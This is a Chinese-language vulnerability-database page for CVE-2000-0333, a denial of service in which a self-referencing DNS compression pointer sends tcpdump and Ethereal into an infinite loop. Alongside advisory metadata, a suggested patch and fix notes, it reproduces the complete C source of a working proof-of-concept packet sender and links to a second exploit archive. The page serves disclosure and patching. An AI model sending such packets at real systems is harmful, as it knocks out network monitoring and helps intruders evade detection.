CVE-2000-0333
CVSS5.0
发布时间 :1999-05-31 00:00:00
修订时间 :2008-09-10 15:04:09
NMCOES    

[原文]tcpdump, Ethereal, and other sniffer packages allow remote attackers to cause a denial of service via malformed DNS packets in which a jump offset refers to itself, which causes tcpdump to enter an infinite loop while decompressing the packet.


[CNNVD]多个Sniffer供应商DNS解码漏洞(CNNVD-199905-054)

        tcpdump, Ethereal, 和其他 sniffer 包中存在漏洞。远程攻击者通过一个跳转偏移指向自身的畸形DNS数据包导致拒绝服务,这将导致tcpdump程序在解压NDS数据包时进入一个无限循环。

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:lbl:tcpdump:3.5a
cpe:/a:ethereal_group:ethereal:0.8.4
cpe:/a:ethereal_group:ethereal:0.8.6
cpe:/a:ethereal_group:ethereal:0.8.5
cpe:/a:lbl:tcpdump:3.4

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0333
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-0333
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-199905-054
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/1165
(VENDOR_ADVISORY)  BID  1165
http://www.securityfocus.com/templates/archive.pike?list=1&msg=Pine.SOL.4.10.10005021942380.2077-100000@paranoia.pgci.ca
(VENDOR_ADVISORY)  BUGTRAQ  20000502 Denial of service attack against tcpdump

- 漏洞信息

多个Sniffer供应商DNS解码漏洞
中危 其他
1999-05-31 00:00:00 2006-09-05 00:00:00
远程  
        tcpdump, Ethereal, 和其他 sniffer 包中存在漏洞。远程攻击者通过一个跳转偏移指向自身的畸形DNS数据包导致拒绝服务,这将导致tcpdump程序在解压NDS数据包时进入一个无限循环。

- 公告与补丁

        Currently the SecurityFocus staff are not aware of any vendor supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com.
        Upgrading to 0.8.7 of Ethereal will solve this problem
        The current tree of tcpdump has a fix in place; this fix is not present in the 3.5 alpha tree, however.
        The author of this vulnerability suggests replacing the ns_nprint function with the following:
        static const u_char *
        ns_nprint(register const u_char *cp, register const u_char *bp)
        {
         register u_int i,j;
         register const u_char *rp;
         register int compress;
        
         i = *cp++;
         j = 0;
         rp = cp + i;
         if ((i & INDIR_MASK) == INDIR_MASK) {
         rp = cp + 1;
         compress = 1;
         } else
         compress = 0;
         if (i != 0)
         while ((i && cp < snapend) && (j<256)) {
         j++;
         if ((i & INDIR_MASK) == INDIR_MASK) {
         cp = bp + (((i << 8) | *cp) & 0x3fff);
         i = *cp++;
         continue;
         }
         if (fn_printn(cp, i, snapend))
         break;
         cp += i;
         putchar('.');
         i = *cp++;
         if (!compress)
         rp += i + 1;
         }
         else
         putchar('.');
         return (rp);
        }

- 漏洞信息 (19891)

Ethereal 0.8.4/0.8.5/0.8.6,tcpdump 3.4/3.5 alpha DNS Decode Vulnerability (1) (EDBID:19891)
linux remote
1999-05-31 Verified
0 Hugo Breton
N/A [点击下载]
source: http://www.securityfocus.com/bid/1165/info

A vulnerability exists in the DNS decode capabilities provided as part of the tcpdump sniffer, from LBL, as well as other sniffers, including Ethereal, by Gerald Combs. These sniffers will attempt to decode DNS request and queries. However, due to the DNS name compression scheme, it is possible to create a DNS packet such that tcpdump will be caught in an infinite loop, while trying to decompress. This will prevent the sniffer from displaying further packets. If tcpdump is being used as some part of and intrusion detection system, this could allow an intruder to evade this system.

When tcpdump is logging to a file, it is not affected by this vulnerability. Upon reading from a file which contains recorded packets, it will enter an infinite loop when it encounters packets of this type.

/* dnsloop.c by Hugo Breton (bretonh@pgci.ca)

   This program illustrates the bug in tcpdump when handling jumps in the DNS
   hostname decompression.
*/


#include <stdio.h>
#include <string.h>
#include <netdb.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>


int main(int argc,char * * argv)
{
        char p[18];
        int sock;
        struct sockaddr_in sin;
        struct hostent * hoste;

        printf("dnsloop.c by Hugo Breton (bretonh@pgci.ca)\n");

        if(argc<2)
        {
                printf("usage: %s host\n",argv[0]);
                return(0);
        }

        bzero((void *) &sin,sizeof(sin));
        sin.sin_family=AF_INET;
        sin.sin_port=htons(53);

        if((sin.sin_addr.s_addr=inet_addr(argv[1]))==-1)
        {
                if((hoste=gethostbyname(argv[1]))==NULL)
                {
                        printf("unknown host %s\n",argv[1]);
                        return(0);
                }
                
                bcopy(hoste->h_addr,&sin.sin_addr.s_addr,4);
        }

        bzero((void *) p,18);
        * ((unsigned short *) (p+0))=htons(867-5309);
        * ((unsigned short *) (p+4))=htons(1);
        * ((unsigned short *) (p+12))=htons(32768+16384+12);
        * ((unsigned short *) (p+14))=htons(1);
        * ((unsigned short *) (p+16))=htons(1);

        if((sock=socket(AF_INET,SOCK_DGRAM,0))==-1)
        {
                printf("unable to create UDP socket\n");
                return(0);
        }

        if(sendto(sock,p,18,0,(struct sockaddr *) &sin,sizeof(sin))==-1)
        {
                printf("unable to send packet\n");
                return(0);
        }

        printf("packet sent to host %s\n",argv[1]);

        return(0);
}		

- 漏洞信息 (19892)

Ethereal 0.8.4/0.8.5/0.8.6,tcpdump 3.4/3.5 alpha DNS Decode Vulnerability (2) (EDBID:19892)
linux remote
1999-05-31 Verified
0 scut
N/A [点击下载]
source: http://www.securityfocus.com/bid/1165/info
 
A vulnerability exists in the DNS decode capabilities provided as part of the tcpdump sniffer, from LBL, as well as other sniffers, including Ethereal, by Gerald Combs. These sniffers will attempt to decode DNS request and queries. However, due to the DNS name compression scheme, it is possible to create a DNS packet such that tcpdump will be caught in an infinite loop, while trying to decompress. This will prevent the sniffer from displaying further packets. If tcpdump is being used as some part of and intrusion detection system, this could allow an intruder to evade this system.
 
When tcpdump is logging to a file, it is not affected by this vulnerability. Upon reading from a file which contains recorded packets, it will enter an infinite loop when it encounters packets of this type.

http://www.exploit-db.com/sploits/19892.tar.gz		

- 漏洞信息

4488
Multiple Sniffer Malformed DNS Packet Parsing Remote DoS
Remote / Network Access Denial of Service
Loss of Availability Upgrade
Exploit Public Third-party Verified

- 漏洞描述

- 时间线

2000-05-02 Unknow
Unknow Unknow

- 解决方案

Upgrade Gerald Combs Ethereal to version 0.8.7 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Multiple Sniffer Vendor DNS Decode Vulnerability
Failure to Handle Exceptional Conditions 1165
Yes No
1999-05-31 12:00:00 2009-07-11 01:56:00
This vulnerability was originally posted to the Bugtraq mailing list on May 31, 1999 by Sebastian <scut@nb.in-berlin.de> The same vulnerability was reported to the Bugtraq mailing list on May 2, 2000 by Hugo Breton <bretonh@paranoia.pgci.ca>

- 受影响的程序版本

LBL tcpdump 3.5 alpha
LBL tcpdump 3.4
+ RedHat Linux 7.1 ia64
+ RedHat Linux 7.1 i386
+ RedHat Linux 7.1 alpha
+ RedHat Linux 7.0 i386
+ RedHat Linux 7.0 alpha
+ RedHat Linux 6.2 sparc
+ RedHat Linux 6.2 i386
+ RedHat Linux 6.2 alpha
Gerald Combs Ethereal 0.8.6
Gerald Combs Ethereal 0.8.5
Gerald Combs Ethereal 0.8.4
Gerald Combs Ethereal 0.8.7

- 不受影响的程序版本

Gerald Combs Ethereal 0.8.7

- 漏洞讨论

A vulnerability exists in the DNS decode capabilities provided as part of the tcpdump sniffer, from LBL, as well as other sniffers, including Ethereal, by Gerald Combs. These sniffers will attempt to decode DNS request and queries. However, due to the DNS name compression scheme, it is possible to create a DNS packet such that tcpdump will be caught in an infinite loop, while trying to decompress. This will prevent the sniffer from displaying further packets. If tcpdump is being used as some part of and intrusion detection system, this could allow an intruder to evade this system.

When tcpdump is logging to a file, it is not affected by this vulnerability. Upon reading from a file which contains recorded packets, it will enter an infinite loop when it encounters packets of this type.

- 漏洞利用

An exploit has been made available.

- 解决方案

Currently the SecurityFocus staff are not aware of any vendor supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com.
Upgrading to 0.8.7 of Ethereal will solve this problem
The current tree of tcpdump has a fix in place; this fix is not present in the 3.5 alpha tree, however.

The author of this vulnerability suggests replacing the ns_nprint function with the following:

static const u_char *
ns_nprint(register const u_char *cp, register const u_char *bp)
{
register u_int i,j;
register const u_char *rp;
register int compress;

i = *cp++;
j = 0;
rp = cp + i;
if ((i & INDIR_MASK) == INDIR_MASK) {
rp = cp + 1;
compress = 1;
} else
compress = 0;
if (i != 0)
while ((i && cp < snapend) && (j<256)) {
j++;
if ((i & INDIR_MASK) == INDIR_MASK) {
cp = bp + (((i << 8) | *cp) & 0x3fff);
i = *cp++;
continue;
}
if (fn_printn(cp, i, snapend))
break;
cp += i;
putchar('.');
i = *cp++;
if (!compress)
rp += i + 1;
}
else
putchar('.');
return (rp);
}

- 相关参考

     

     

    关于SCAP中文社区

    SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

    版权声明

    CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站